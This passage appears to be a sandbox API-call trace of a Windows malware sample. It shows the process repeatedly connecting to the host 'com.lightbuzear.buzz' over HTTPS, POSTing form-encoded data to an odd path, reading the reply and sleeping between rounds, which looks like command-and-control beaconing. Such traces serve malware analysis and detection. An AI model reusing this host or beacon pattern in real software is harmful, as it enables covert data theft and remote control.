0x47fb898 [0238.038] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48304a8 | out: hHeap=0x4780000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48304a8 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0238.038] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306b0 [0238.039] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0238.039] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0238.039] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0238.039] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0239.187] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0239.187] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0239.187] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0239.188] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0239.188] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0239.188] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0239.188] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0239.188] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0239.188] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0239.188] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0239.188] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0239.188] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0239.188] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0239.188] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48159b0 [0239.188] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0239.188] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815950 [0239.188] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159b0 | out: hHeap=0x4780000) returned 1 [0239.189] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0239.189] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815950 | out: hHeap=0x4780000) returned 1 [0239.189] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48307c8 [0239.189] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0239.189] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0239.189] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48307c8 | out: hHeap=0x4780000) returned 1 [0239.189] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48305e8 [0239.189] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0239.189] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830908 [0239.189] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0239.190] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0239.190] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0239.190] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0239.190] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830908 | out: hHeap=0x4780000) returned 1 [0239.191] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0239.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0239.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0239.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0239.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0239.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0239.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0239.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0239.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0239.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0239.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815ab8 [0239.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0239.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815860 [0239.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ab8 | out: hHeap=0x4780000) returned 1 [0239.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0239.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815860 | out: hHeap=0x4780000) returned 1 [0239.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830548 [0239.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0239.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0239.191] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830548 | out: hHeap=0x4780000) returned 1 [0239.191] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48308b8 [0239.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0239.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830570 [0239.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0239.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0239.192] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0239.192] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0239.193] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830570 | out: hHeap=0x4780000) returned 1 [0239.193] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0239.193] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0239.193] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0239.193] FreeLibrary (hLibModule=0x71570000) returned 1 [0239.193] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0239.193] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0239.194] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830688 | out: hHeap=0x4780000) returned 1 [0239.194] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830750 | out: hHeap=0x4780000) returned 1 [0239.194] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0239.195] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0239.195] Sleep (dwMilliseconds=0x2710) [0239.205] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0239.205] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0239.205] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0239.205] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0239.205] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0239.205] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0239.206] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0239.206] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0239.206] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0239.206] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155d8 [0239.206] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0239.206] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815638 [0239.206] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0239.206] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0239.206] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0239.206] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48155d8 [0239.206] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0239.215] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0239.215] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0239.215] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0239.215] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0239.215] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0239.215] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0239.215] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0239.215] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0239.215] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0239.215] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0239.215] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0239.215] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0239.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0239.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0239.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0239.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159e0 [0239.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0239.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0239.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159e0 | out: hHeap=0x4780000) returned 1 [0239.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48307c8 [0239.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0239.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0239.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48307c8 | out: hHeap=0x4780000) returned 1 [0239.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48304f8 [0239.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0239.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48308e0 [0239.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0239.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0239.217] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0239.217] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0239.217] FreeLibrary (hLibModule=0x71780000) returned 1 [0239.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48308e0 | out: hHeap=0x4780000) returned 1 [0239.217] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0239.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830548 [0239.217] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0239.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0239.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0239.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0239.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0239.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0239.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0239.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0239.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0239.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0239.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48159f8 [0239.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0239.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a58 [0239.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159f8 | out: hHeap=0x4780000) returned 1 [0239.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0239.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a58 | out: hHeap=0x4780000) returned 1 [0239.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48158a8 [0239.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306b0 [0239.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0239.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0239.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830868 [0239.219] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0239.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830570 [0239.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0239.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0239.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0239.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0239.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0239.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0239.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0239.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0239.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0239.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815ad0 [0239.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0239.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159e0 [0239.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ad0 | out: hHeap=0x4780000) returned 1 [0239.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0239.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159e0 | out: hHeap=0x4780000) returned 1 [0239.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48159b0 [0239.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306d8 [0239.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306d8 | out: hHeap=0x4780000) returned 1 [0239.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0239.220] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0239.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0239.220] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0239.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0239.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0239.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0239.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0239.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0239.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0239.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0239.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a88 [0239.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0239.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815848 [0239.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a88 | out: hHeap=0x4780000) returned 1 [0239.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0239.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815848 | out: hHeap=0x4780000) returned 1 [0239.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48307c8 [0239.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0239.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0239.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48307c8 | out: hHeap=0x4780000) returned 1 [0239.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48307c8 [0239.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0239.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830688 [0239.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0239.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0239.223] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0239.223] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0239.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830688 | out: hHeap=0x4780000) returned 1 [0239.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0239.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0239.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0239.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0239.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0239.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0239.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0239.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0239.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0239.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a28 [0239.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0239.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815ab8 [0239.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a28 | out: hHeap=0x4780000) returned 1 [0239.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0239.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ab8 | out: hHeap=0x4780000) returned 1 [0239.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48308e0 [0239.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0239.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0239.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48308e0 | out: hHeap=0x4780000) returned 1 [0239.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830598 [0239.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0239.224] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830688 [0239.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0239.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0239.225] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0239.225] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0240.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830688 | out: hHeap=0x4780000) returned 1 [0240.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0240.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0240.299] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0240.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0240.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0240.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0240.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0240.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0240.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0240.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0240.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0240.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0240.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815ad0 [0240.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0240.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815ab8 [0240.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ad0 | out: hHeap=0x4780000) returned 1 [0240.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 